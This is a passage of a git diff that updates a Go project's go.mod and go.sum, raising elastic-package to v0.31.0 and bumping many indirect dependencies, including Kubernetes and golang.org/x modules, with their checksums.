diff --git a/go.mod b/go.mod index c9a412fce99..f3ee5403a8c 100644 --- a/go.mod +++ b/go.mod @@ -4,7 +4,7 @@ go 1.17 require ( github.com/blang/semver v3.5.1+incompatible - github.com/elastic/elastic-package v0.29.0 + github.com/elastic/elastic-package v0.31.0 github.com/elastic/package-registry v1.5.1 github.com/magefile/mage v1.11.0 github.com/pkg/errors v0.9.1 @@ -15,60 +15,61 @@ require ( require ( github.com/AlecAivazis/survey/v2 v2.3.2 // indirect github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 // indirect - github.com/MakeNowJust/heredoc v0.0.0-20170808103936-bb23615498cd // indirect + github.com/MakeNowJust/heredoc v1.0.0 // indirect github.com/Masterminds/semver v1.5.0 // indirect github.com/Masterminds/semver/v3 v3.1.1 // indirect - github.com/Microsoft/go-winio v0.4.17 // indirect - github.com/PaesslerAG/gval v1.0.0 // indirect + github.com/Microsoft/go-winio v0.5.1 // indirect + github.com/PaesslerAG/gval v1.1.2 // indirect github.com/PaesslerAG/jsonpath v0.1.1 // indirect - github.com/ProtonMail/go-crypto v0.0.0-20210920160938-87db9fbc61c7 // indirect + github.com/ProtonMail/go-crypto v0.0.0-20211112122917-428f8eabeeb3 // indirect github.com/ProtonMail/go-mime v0.0.0-20190923161245-9b5a4261663a // indirect - github.com/ProtonMail/gopenpgp/v2 v2.2.5 // indirect + github.com/ProtonMail/gopenpgp/v2 v2.3.0 // indirect github.com/PuerkitoBio/purell v1.1.1 // indirect github.com/PuerkitoBio/urlesc v0.0.0-20170810143723-de5bf2ad4578 // indirect github.com/acomagu/bufpipe v1.0.3 // indirect - github.com/andybalholm/brotli v1.0.3 // indirect + github.com/andybalholm/brotli v1.0.4 // indirect github.com/armon/go-radix v1.0.0 // indirect - github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef // indirect + github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d // indirect github.com/aymerick/raymond v2.0.2+incompatible // indirect github.com/cespare/xxhash/v2 v2.1.2 // indirect + github.com/chai2010/gettext-go v0.0.0-20160711120539-c6fed771bfd5 // indirect github.com/creasty/defaults v1.5.2 // indirect github.com/davecgh/go-spew v1.1.1 // indirect github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect - github.com/elastic/go-elasticsearch/v7 v7.15.1 // indirect + github.com/elastic/go-elasticsearch/v7 v7.16.0 // indirect github.com/elastic/go-licenser v0.4.0 // indirect github.com/elastic/go-sysinfo v1.7.1 // indirect github.com/elastic/go-ucfg v0.8.4 // indirect github.com/elastic/go-windows v1.0.1 // indirect github.com/elastic/package-spec v1.3.0 // indirect github.com/emirpasic/gods v1.12.0 // indirect - github.com/evanphx/json-patch v4.11.0+incompatible // indirect - github.com/exponent-io/jsonpath v0.0.0-20151013193312-d6023ce2651d // indirect + github.com/evanphx/json-patch v5.6.0+incompatible // indirect + github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f // indirect github.com/fatih/color v1.13.0 // indirect - github.com/go-errors/errors v1.0.1 // indirect + github.com/go-errors/errors v1.4.1 // indirect github.com/go-git/gcfg v1.5.0 // indirect github.com/go-git/go-billy/v5 v5.3.1 // indirect github.com/go-git/go-git/v5 v5.4.2 // indirect - github.com/go-logr/logr v0.4.0 // indirect - github.com/go-openapi/errors v0.19.8 // indirect + github.com/go-logr/logr v1.2.2 // indirect + github.com/go-openapi/errors v0.20.1 // indirect github.com/go-openapi/jsonpointer v0.19.5 // indirect - github.com/go-openapi/jsonreference v0.19.5 // indirect - github.com/go-openapi/strfmt v0.21.0 // indirect - github.com/go-openapi/swag v0.19.14 // indirect - github.com/go-stack/stack v1.8.0 // indirect + github.com/go-openapi/jsonreference v0.19.6 // indirect + github.com/go-openapi/strfmt v0.21.1 // indirect + github.com/go-openapi/swag v0.19.15 // indirect + github.com/go-stack/stack v1.8.1 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/protobuf v1.5.2 // indirect - github.com/golang/snappy v0.0.2 // indirect + github.com/golang/snappy v0.0.4 // indirect github.com/google/btree v1.0.1 // indirect - github.com/google/go-cmp v0.5.5 // indirect + github.com/google/go-cmp v0.5.6 // indirect github.com/google/go-github/v32 v32.1.0 // indirect github.com/google/go-querystring v1.1.0 // indirect - github.com/google/gofuzz v1.1.0 // indirect + github.com/google/gofuzz v1.2.0 // indirect github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect - github.com/google/uuid v1.2.0 // indirect + github.com/google/uuid v1.3.0 // indirect github.com/googleapis/gnostic v0.5.5 // indirect github.com/gorilla/mux v1.8.0 // indirect - github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7 // indirect + github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79 // indirect github.com/imdario/mergo v0.3.12 // indirect github.com/inconshreveable/mousetrap v1.0.0 // indirect github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99 // indirect @@ -76,83 +77,85 @@ require ( github.com/jedib0t/go-pretty v4.3.0+incompatible // indirect github.com/joeshaw/multierror v0.0.0-20140124173710-69b34d4ec901 // indirect github.com/josharian/intern v1.0.0 // indirect - github.com/json-iterator/go v1.1.11 // indirect + github.com/json-iterator/go v1.1.12 // indirect github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect - github.com/kevinburke/ssh_config v0.0.0-20201106050909-4977a11b4351 // indirect + github.com/kevinburke/ssh_config v1.1.0 // indirect github.com/klauspost/compress v1.13.6 // indirect github.com/klauspost/pgzip v1.2.5 // indirect github.com/kylelemons/godebug v1.1.0 // indirect github.com/liggitt/tabwriter v0.0.0-20181228230101-89fcab3d43de // indirect - github.com/mailru/easyjson v0.7.6 // indirect - github.com/mattn/go-colorable v0.1.9 // indirect + github.com/mailru/easyjson v0.7.7 // indirect + github.com/mattn/go-colorable v0.1.12 // indirect github.com/mattn/go-isatty v0.0.14 // indirect - github.com/mattn/go-runewidth v0.0.9 // indirect + github.com/mattn/go-runewidth v0.0.13 // indirect github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d // indirect github.com/mholt/archiver/v3 v3.5.1 // indirect github.com/mitchellh/go-homedir v1.1.0 // indirect - github.com/mitchellh/go-wordwrap v1.0.0 // indirect - github.com/mitchellh/mapstructure v1.4.1 // indirect + github.com/mitchellh/go-wordwrap v1.0.1 // indirect + github.com/mitchellh/mapstructure v1.4.3 // indirect github.com/moby/spdystream v0.2.0 // indirect - github.com/moby/term v0.0.0-20210610120745-9d4ed1856297 // indirect + github.com/moby/term v0.0.0-20210619224110-3f7ff695adc6 // indirect github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect - github.com/modern-go/reflect2 v1.0.1 // indirect + github.com/modern-go/reflect2 v1.0.2 // indirect github.com/monochromegane/go-gitignore v0.0.0-20200626010858-205db1a8cc00 // indirect - github.com/nwaples/rardecode v1.1.0 // indirect + github.com/nwaples/rardecode v1.1.2 // indirect github.com/oklog/ulid v1.3.1 // indirect github.com/olekukonko/tablewriter v0.0.5 // indirect github.com/peterbourgon/diskv v2.0.1+incompatible // indirect - github.com/pierrec/lz4/v4 v4.1.2 // indirect + github.com/pierrec/lz4/v4 v4.1.12 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect github.com/prometheus/procfs v0.7.3 // indirect - github.com/russross/blackfriday v1.5.2 // indirect + github.com/rivo/uniseg v0.2.0 // indirect + github.com/russross/blackfriday v1.6.0 // indirect github.com/santhosh-tekuri/jsonschema v1.2.4 // indirect - github.com/sergi/go-diff v1.1.0 // indirect + github.com/sergi/go-diff v1.2.0 // indirect github.com/sirupsen/logrus v1.8.1 // indirect github.com/spf13/cobra v1.2.1 // indirect github.com/spf13/pflag v1.0.5 // indirect - github.com/ulikunitz/xz v0.5.9 // indirect - github.com/xanzy/ssh-agent v0.3.0 // indirect + github.com/ulikunitz/xz v0.5.10 // indirect + github.com/xanzy/ssh-agent v0.3.1 // indirect github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect github.com/xeipuuv/gojsonschema v1.2.0 // indirect github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect - github.com/xlab/treeprint v0.0.0-20181112141820-a009c3971eca // indirect + github.com/xlab/treeprint v1.1.0 // indirect go.elastic.co/apm v1.14.0 // indirect go.elastic.co/apm/module/apmgorilla v1.14.0 // indirect go.elastic.co/apm/module/apmhttp v1.14.0 // indirect go.elastic.co/fastjson v1.1.0 // indirect - go.mongodb.org/mongo-driver v1.7.3 // indirect - go.starlark.net v0.0.0-20200306205701-8dd3e2ee1dd5 // indirect - golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a // indirect + go.mongodb.org/mongo-driver v1.8.1 // indirect + go.starlark.net v0.0.0-20211203141949-70c0e40ae128 // indirect + golang.org/x/crypto v0.0.0-20211209193657-4570a0811e8b // indirect golang.org/x/lint v0.0.0-20210508222113-6edffad5e616 // indirect golang.org/x/mod v0.5.1 // indirect - golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d // indirect - golang.org/x/oauth2 v0.0.0-20210402161424-2e8d93401602 // indirect - golang.org/x/sys v0.0.0-20211102192858-4dd72447c267 // indirect - golang.org/x/term v0.0.0-20210503060354-a79de5458b56 // indirect - golang.org/x/text v0.3.6 // indirect - golang.org/x/time v0.0.0-20210723032227-1f47c861a9ac // indirect - golang.org/x/tools v0.1.7 // indirect + golang.org/x/net v0.0.0-20211209124913-491a49abca63 // indirect + golang.org/x/oauth2 v0.0.0-20211104180415-d3ed0bb246c8 // indirect + golang.org/x/sys v0.0.0-20211214150614-024a26f5d6e2 // indirect + golang.org/x/term v0.0.0-20210927222741-03fcf44c2211 // indirect + golang.org/x/text v0.3.7 // indirect + golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 // indirect + golang.org/x/tools v0.1.8 // indirect golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 // indirect google.golang.org/appengine v1.6.7 // indirect - google.golang.org/protobuf v1.26.0 // indirect + google.golang.org/protobuf v1.27.1 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/warnings.v0 v0.1.2 // indirect gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect - helm.sh/helm/v3 v3.7.1 // indirect + helm.sh/helm/v3 v3.7.2 // indirect howett.net/plist v0.0.0-20201203080718-1454fab16a06 // indirect - k8s.io/api v0.22.3 // indirect - k8s.io/apiextensions-apiserver v0.22.1 // indirect - k8s.io/apimachinery v0.22.3 // indirect - k8s.io/cli-runtime v0.22.3 // indirect - k8s.io/client-go v0.22.3 // indirect - k8s.io/component-base v0.22.1 // indirect - k8s.io/klog/v2 v2.9.0 // indirect - k8s.io/kube-openapi v0.0.0-20210421082810-95288971da7e // indirect - k8s.io/kubectl v0.22.1 // indirect - k8s.io/utils v0.0.0-20210819203725-bdf08cb9a70a // indirect - sigs.k8s.io/kustomize/api v0.8.11 // indirect - sigs.k8s.io/kustomize/kyaml v0.11.0 // indirect - sigs.k8s.io/structured-merge-diff/v4 v4.1.2 // indirect - sigs.k8s.io/yaml v1.2.0 // indirect + k8s.io/api v0.23.0 // indirect + k8s.io/apiextensions-apiserver v0.23.0 // indirect + k8s.io/apimachinery v0.23.0 // indirect + k8s.io/cli-runtime v0.23.0 // indirect + k8s.io/client-go v0.23.0 // indirect + k8s.io/component-base v0.23.0 // indirect + k8s.io/klog/v2 v2.30.0 // indirect + k8s.io/kube-openapi v0.0.0-20211115234752-e816edb12b65 // indirect + k8s.io/kubectl v0.23.0 // indirect + k8s.io/utils v0.0.0-20211208161948-7d6a63dca704 // indirect + sigs.k8s.io/json v0.0.0-20211208200746-9f7c6b3444d2 // indirect + sigs.k8s.io/kustomize/api v0.10.1 // indirect + sigs.k8s.io/kustomize/kyaml v0.13.0 // indirect + sigs.k8s.io/structured-merge-diff/v4 v4.2.0 // indirect + sigs.k8s.io/yaml v1.3.0 // indirect ) diff --git a/go.sum b/go.sum index 0f9577081fa..669da6c65df 100644 --- a/go.sum +++ b/go.sum @@ -61,8 +61,9 @@ github.com/Azure/go-autorest/tracing v0.6.0/go.mod h1:+vhtPC754Xsa23ID7GlGsrdKBp github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= github.com/DATA-DOG/go-sqlmock v1.5.0/go.mod h1:f/Ixk793poVmq4qj/V1dPUg2JEAKC73Q5eFN3EC/SaM= -github.com/MakeNowJust/heredoc v0.0.0-20170808103936-bb23615498cd h1:sjQovDkwrZp8u+gxLtPgKGjk5hCxuy2hrRejBTA9xFU= github.com/MakeNowJust/heredoc v0.0.0-20170808103936-bb23615498cd/go.mod h1:64YHyfSL2R96J44Nlwm39UHepQbyR5q10x7iYa1ks2E= +github.com/MakeNowJust/heredoc v1.0.0 h1:cXCdzVdstXyiTqTvfqk9SDHpKNjxuom+DOlyEeQ4pzQ= +github.com/MakeNowJust/heredoc v1.0.0/go.mod h1:mG5amYoWBHf8vpLOuehzbGGw0EHxpZZ6lCpQ4fNJ8LE= github.com/Masterminds/goutils v1.1.0/go.mod h1:8cTjp+g8YejhMuvIA5y2vz3BpJxksy863GQaJW2MFNU= github.com/Masterminds/goutils v1.1.1/go.mod h1:8cTjp+g8YejhMuvIA5y2vz3BpJxksy863GQaJW2MFNU= github.com/Masterminds/semver v1.5.0 h1:H65muMkzWKEuNDnfl9d70GUjFniHKHRbFPGBuZ3QEww= @@ -72,7 +73,7 @@ github.com/Masterminds/semver/v3 v3.1.1 h1:hLg3sBzpNErnxhQtUy/mmLR2I9foDujNK030I github.com/Masterminds/semver/v3 v3.1.1/go.mod h1:VPu/7SZ7ePZ3QOrcuXROw5FAcLl4a0cBrbBpGY/8hQs= github.com/Masterminds/sprig v2.22.0+incompatible/go.mod h1:y6hNFY5UBTIWBxnzTeuNhlNS5hqE0NB0E6fgfo2Br3o= github.com/Masterminds/sprig/v3 v3.2.2/go.mod h1:UoaO7Yp8KlPnJIYWTFkMaqPUYKTfGFPhxNuwnnxkKlk= -github.com/Masterminds/squirrel v1.5.0/go.mod h1:NNaOrjSoIDfDA40n7sr2tPNZRfjzjA400rg+riTZj10= +github.com/Masterminds/squirrel v1.5.2/go.mod h1:NNaOrjSoIDfDA40n7sr2tPNZRfjzjA400rg+riTZj10= github.com/Masterminds/vcs v1.13.1/go.mod h1:N09YCmOQr6RLxC6UNHzuVwAdodYbbnycGHSmwVJjcKA= github.com/Microsoft/go-winio v0.4.11/go.mod h1:VhR8bwka0BXejwEJY73c50VrPtXAaKcyvVC4A4RozmA= github.com/Microsoft/go-winio v0.4.14/go.mod h1:qXqCSQ3Xa7+6tgxaGTIe4Kpcdsi+P8jBhyzoq1bpyYA= @@ -81,8 +82,10 @@ github.com/Microsoft/go-winio v0.4.16-0.20201130162521-d1ffc52c7331/go.mod h1:XB github.com/Microsoft/go-winio v0.4.16/go.mod h1:XB6nPKklQyQ7GC9LdcBEcBl8PF76WugXOPRXwdLnMv0= github.com/Microsoft/go-winio v0.4.17-0.20210211115548-6eac466e5fa3/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= github.com/Microsoft/go-winio v0.4.17-0.20210324224401-5516f17a5958/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= -github.com/Microsoft/go-winio v0.4.17 h1:iT12IBVClFevaf8PuVyi3UmZOVh4OqnaLxDTW2O6j3w= github.com/Microsoft/go-winio v0.4.17/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= +github.com/Microsoft/go-winio v0.5.0/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= +github.com/Microsoft/go-winio v0.5.1 h1:aPJp2QD7OOrhO5tQXqQoGSJc+DjDtWTGLOmNyAm6FgY= +github.com/Microsoft/go-winio v0.5.1/go.mod h1:JPGBdM1cNvN/6ISo+n8V5iA4v8pBzdOpzfwIujj1a84= github.com/Microsoft/hcsshim v0.8.6/go.mod h1:Op3hHsoHPAvb6lceZHDtd9OkTew38wNoXnJs8iY7rUg= github.com/Microsoft/hcsshim v0.8.7-0.20190325164909-8abdbb8205e4/go.mod h1:Op3hHsoHPAvb6lceZHDtd9OkTew38wNoXnJs8iY7rUg= github.com/Microsoft/hcsshim v0.8.7/go.mod h1:OHd7sQqRFrYd3RmSgbgji+ctCwkbq2wbEYNSzOYtcBQ= @@ -98,18 +101,19 @@ github.com/NYTimes/gziphandler v1.1.1/go.mod h1:n/CVRwUEOgIxrgPvAQhUUr9oeUtvrhMo github.com/Netflix/go-expect v0.0.0-20180615182759-c93bf25de8e8 h1:xzYJEypr/85nBpB11F9br+3HUrpgb+fcm5iADzXXYEw= github.com/Netflix/go-expect v0.0.0-20180615182759-c93bf25de8e8/go.mod h1:oX5x61PbNXchhh0oikYAH+4Pcfw5LKv21+Jnpr6r6Pc= github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU= -github.com/PaesslerAG/gval v1.0.0 h1:GEKnRwkWDdf9dOmKcNrar9EA1bz1z9DqPIO1+iLzhd8= github.com/PaesslerAG/gval v1.0.0/go.mod h1:y/nm5yEyTeX6av0OfKJNp9rBNj2XrGhAf5+v24IBN1I= +github.com/PaesslerAG/gval v1.1.2 h1:EROKxV4/fAKWb0Qoj7NOxmHZA7gcpjOV9XgiRZMRCUU= +github.com/PaesslerAG/gval v1.1.2/go.mod h1:Fa8gfkCmUsELXgayr8sfL/sw+VzCVoa03dcOcR/if2w= github.com/PaesslerAG/jsonpath v0.1.0/go.mod h1:4BzmtoM/PI8fPO4aQGIusjGxGir2BzcV0grWtFzq1Y8= github.com/PaesslerAG/jsonpath v0.1.1 h1:c1/AToHQMVsduPAa4Vh6xp2U0evy4t8SWp8imEsylIk= github.com/PaesslerAG/jsonpath v0.1.1/go.mod h1:lVboNxFGal/VwW6d9JzIy56bUsYAP6tH/x80vjnCseY= github.com/ProtonMail/go-crypto v0.0.0-20210428141323-04723f9f07d7/go.mod h1:z4/9nQmJSSwwds7ejkxaJwO37dru3geImFUdJlaLzQo= -github.com/ProtonMail/go-crypto v0.0.0-20210920160938-87db9fbc61c7 h1:DSqTh6nEes/uO8BlNcGk8PzZsxY2sN9ZL//veWBdTRI= -github.com/ProtonMail/go-crypto v0.0.0-20210920160938-87db9fbc61c7/go.mod h1:z4/9nQmJSSwwds7ejkxaJwO37dru3geImFUdJlaLzQo= +github.com/ProtonMail/go-crypto v0.0.0-20211112122917-428f8eabeeb3 h1:XcF0cTDJeiuZ5NU8w7WUDge0HRwwNRmxj/GGk6KSA6g= +github.com/ProtonMail/go-crypto v0.0.0-20211112122917-428f8eabeeb3/go.mod h1:z4/9nQmJSSwwds7ejkxaJwO37dru3geImFUdJlaLzQo= github.com/ProtonMail/go-mime v0.0.0-20190923161245-9b5a4261663a h1:W6RrgN/sTxg1msqzFFb+G80MFmpjMw61IU+slm+wln4= github.com/ProtonMail/go-mime v0.0.0-20190923161245-9b5a4261663a/go.mod h1:NYt+V3/4rEeDuaev/zw1zCq8uqVEuPHzDPo3OZrlGJ4= -github.com/ProtonMail/gopenpgp/v2 v2.2.5 h1:5kbOX9bzTxtxLKAQigooQYOthkmqEHZd65gqC2IQlmc= -github.com/ProtonMail/gopenpgp/v2 v2.2.5/go.mod h1:ygdaHbrbWFPhKjmXii0zOs3/xlSR/01GaVePKqv19Hc= +github.com/ProtonMail/gopenpgp/v2 v2.3.0 h1:eniutitHk02Yn3GtaDfJTVm/Ca1e8s6zkS0SpeaocXI= +github.com/ProtonMail/gopenpgp/v2 v2.3.0/go.mod h1:F62x0m3akQuisX36pOgAtKOHZ1E7/MpnX8bZWCK+5dA= github.com/PuerkitoBio/purell v1.1.1 h1:WEQqlqaGbrPkxLJWfBwQmfEAE1Z7ONdDLqrN38tNFfI= github.com/PuerkitoBio/purell v1.1.1/go.mod h1:c11w/QuzBsJSee3cPx9rAFu61PvFxuPbtSwDGJws/X0= github.com/PuerkitoBio/urlesc v0.0.0-20170810143723-de5bf2ad4578 h1:d+Bc7a5rLufV/sSk/8dngufqelfh6jnri85riMAaF/M= @@ -124,11 +128,13 @@ github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRF github.com/alecthomas/units v0.0.0-20190924025748-f65c72e2690d/go.mod h1:rBZYJk541a8SKzHPHnH3zbiI+7dagKZ0cgpgrD7Fyho= github.com/alexflint/go-filemutex v0.0.0-20171022225611-72bdc8eae2ae/go.mod h1:CgnQgUtFrFz9mxFNtED3jI5tLDjKlOM+oUF/sTk6ps0= github.com/andybalholm/brotli v1.0.1/go.mod h1:loMXtMfwqflxFJPmdbJO0a3KNoPuLBgiu3qAvBg8x/Y= -github.com/andybalholm/brotli v1.0.3 h1:fpcw+r1N1h0Poc1F/pHbW40cUm/lMEQslZtCkBQ0UnM= github.com/andybalholm/brotli v1.0.3/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= +github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY= +github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239 h1:kFOfPq6dUM1hTo4JG6LR5AXSUEsOjtdm0kw0FtQtMJA= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239/go.mod h1:2FmKhYUyUczH0OGQWaF5ceTx0UBShxjsH6f8oGKYe2c= github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= +github.com/antlr/antlr4/runtime/Go/antlr v0.0.0-20210826220005-b48c857c3a0e/go.mod h1:F7bn7fEU90QkQ3tnmaTx3LTKLEDqnwWODIYppRQ5hnY= github.com/armon/circbuf v0.0.0-20150827004946-bbbad097214e/go.mod h1:3U/XgcO3hCbHZ8TKRvWD2dDTCfh9M9ya+I9JpbB7O8o= github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5doyWs3UAsr3K4I6qtAmlQcZDesFNEHPZAzj8= github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY= @@ -139,13 +145,15 @@ github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPd github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5/go.mod h1:wHh0iHkYZB8zMSxRWpUBQtwG5a7fFgvEO+odwuTv2gs= github.com/asaskevich/govalidator v0.0.0-20190424111038-f61b66f89f4a/go.mod h1:lB+ZfQJz7igIIfQNfa7Ml4HSf2uFQQRzpGGRXenZAgY= github.com/asaskevich/govalidator v0.0.0-20200428143746-21a406dcc535/go.mod h1:oGkLhpf+kjZl6xBf758TQhh5XrAeiJv/7FRz/2spLIg= -github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef h1:46PFijGLmAjMPwCCCo7Jf0W6f9slllCkkv7vyc1yOSg= github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= +github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d h1:Byv0BzEl3/e6D5CLfI0j/7hiIEtvGVFPCZ7Ei2oq8iQ= +github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= github.com/aws/aws-sdk-go v1.15.11/go.mod h1:mFuSZ37Z9YOHbQEwBWztmVzqXrEkub65tZoCYDt7FT0= github.com/aws/aws-sdk-go v1.34.9/go.mod h1:5zCpMtNQVjRREroY7sYe8lOMRSxkhG6MZveU8YkpAk0= github.com/aymerick/raymond v2.0.2+incompatible h1:VEp3GpgdAnv9B2GFyTvqgcKvY+mfKMjPOA3SbKLtnU0= github.com/aymerick/raymond v2.0.2+incompatible/go.mod h1:osfaiScAUVup+UC9Nfq76eWqDhXlp+4UYaA8uhTBO6g= github.com/benbjohnson/clock v1.0.3/go.mod h1:bGMdMPoPVvcYyt1gHDf4J2KE153Yf9BuiUKYMaxlTDM= +github.com/benbjohnson/clock v1.1.0/go.mod h1:J11/hYXuz8f4ySSvYwY0FKfm+ezbsZBKZxNJlLklBHA= github.com/beorn7/perks v0.0.0-20160804104726-4c0e84591b9a/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8= @@ -174,6 +182,7 @@ github.com/cespare/xxhash v1.1.0/go.mod h1:XrSqR1VqqWfGrhpAt58auRo0WTKS1nRRg3ghf github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/cespare/xxhash/v2 v2.1.2 h1:YRXhKfTDauu4ajMg1TPgFO5jnlC2HCbmLXMcTG5cbYE= github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= +github.com/chai2010/gettext-go v0.0.0-20160711120539-c6fed771bfd5 h1:7aWHqerlJ41y6FOsEUvknqgXnGmJyJSbjhAWq5pO4F8= github.com/chai2010/gettext-go v0.0.0-20160711120539-c6fed771bfd5/go.mod h1:/iP1qXHoty45bqomnu2LM+VVyAEdWN+vtSHGlQgyxbw= github.com/checkpoint-restore/go-criu/v4 v4.1.0/go.mod h1:xUQBLp4RLc5zJtWY++yjOoMoB5lihDt7fai+75m+rGw= github.com/checkpoint-restore/go-criu/v5 v5.0.0/go.mod h1:cfwC0EG7HMUenopBsUf9d89JlCLQIfgVcNsNN0t6T2M= @@ -189,6 +198,7 @@ github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDk github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/udpa/go v0.0.0-20200629203442-efcf912fb354/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cockroachdb/datadriven v0.0.0-20190809214429-80d97fb3cbaa/go.mod h1:zn76sxSg3SzpJ0PPJaLDCu+Bu0Lg3sKTORVIj19EIF8= github.com/cockroachdb/datadriven v0.0.0-20200714090401-bf6692d28da5/go.mod h1:h6jFvWxBdQXxjopDMZyH2UVceIRfR84bdzbkoKrsWNo= github.com/cockroachdb/errors v1.2.4/go.mod h1:rQD95gz6FARkaKkQXUksEje/d9a6wBJoCr5oaCLELYA= @@ -336,10 +346,10 @@ github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5/go.mod h1:qssHWj6 github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= github.com/dustin/go-humanize v0.0.0-20171111073723-bb3d318650d4/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk= -github.com/elastic/elastic-package v0.29.0 h1:1HTetQx1z5KHdGLbuqh/LZ5BmmxSGtFY+Qj6pNO3Mfc= -github.com/elastic/elastic-package v0.29.0/go.mod h1:xWp19lTljbZpoUuqSA2GY//b4HrcMVns2WXG3gCP3Is= -github.com/elastic/go-elasticsearch/v7 v7.15.1 h1:Wd8RLHb5D8xPBU8vGlnLXyflkso9G+rCmsXjqH8LLQQ= -github.com/elastic/go-elasticsearch/v7 v7.15.1/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= +github.com/elastic/elastic-package v0.31.0 h1:RZAZ/Q6uyvAz/oOALj85zTKs5UZVxuOPlLQJJ0WIY4o= +github.com/elastic/elastic-package v0.31.0/go.mod h1:fSY4v7vQFjxObDaUsWBWwF52z6mWPRjE7NTC65WcPuo= +github.com/elastic/go-elasticsearch/v7 v7.16.0 h1:GHsxDFXIAlhSleXun4kwA89P7kQFADRChqvgOPeYP5A= +github.com/elastic/go-elasticsearch/v7 v7.16.0/go.mod 